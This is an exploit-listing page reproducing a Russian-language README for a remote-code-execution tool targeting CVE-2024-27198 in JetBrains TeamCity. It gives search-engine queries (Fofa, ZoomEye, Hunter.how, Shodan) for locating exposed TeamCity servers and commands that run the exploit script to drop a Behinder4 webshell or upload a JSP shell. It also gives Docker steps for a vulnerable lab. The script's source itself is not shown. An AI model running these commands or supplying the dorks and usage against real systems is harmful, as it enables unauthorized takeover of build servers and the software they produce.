Sploitus

Exploit for CVE-2024-27198-RCE

kitploit · 2026-08-30

Exploit Code

MARKDOWN84 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-W01FH4CKER-CVE-2024-27198-RCE
# Dork для поиска в киберпространстве

## Fofa

root@kitploit:~
    
    
    app="JET_BRAINS-TeamCity"
    

## ZoomEye

root@kitploit:~
    
    
    app:"JetBrains TeamCity"
    

## Hunter.how

root@kitploit:~
    
    
    product.name="TeamCity"
    

## Shodan

root@kitploit:~
    
    
    http.component:"teamcity"
    

# Как использовать

Я использую `Python3.9`.

root@kitploit:~
    
    
    pip install requests urllib3 faker
    python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 --behinder4
    # python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 -f shell.jsp
    

![](https://assets.kitploit.com/production/public/readmes/21586/dd7b1a863c0be6311d72b5ccec6e20e8e6ea796babc87be8ca2b9db3c109a094.png)

![](https://assets.kitploit.com/production/public/readmes/21586/b925f836690b7129250faa0d819fb47fee7428b2f0a771fa78f2b82adc8df8a8.png)

также:

root@kitploit:~
    
    
    python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111
    

![](https://assets.kitploit.com/production/public/readmes/21586/cfe746b976ee81484c43300c478cad0b97fe523752359c8211c9934cb0a2c81e.png)

# Настройка среды для воспроизведения уязвимости

Используйте docker, чтобы скачать уязвимый образ и запустить его:

root@kitploit:~
    
    
    sudo docker pull jetbrains/teamcity-server:2023.11.3
    sudo docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
    # sudo ufw disable
    

Затем выполните базовые настройки:

![](https://assets.kitploit.com/production/public/readmes/21586/2602f48febf01b60a87019c9a4e6098083886522cc8dde78710cc80ac65e8cc3.png)

![](https://assets.kitploit.com/production/public/readmes/21586/4c35abc044fc73cd7adc0d3ccbc3d573fde1a4eb2a247e34774defbc6307788f.png)

# Ссылки

https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

https://github.com/Chocapikk/CVE-2024-27198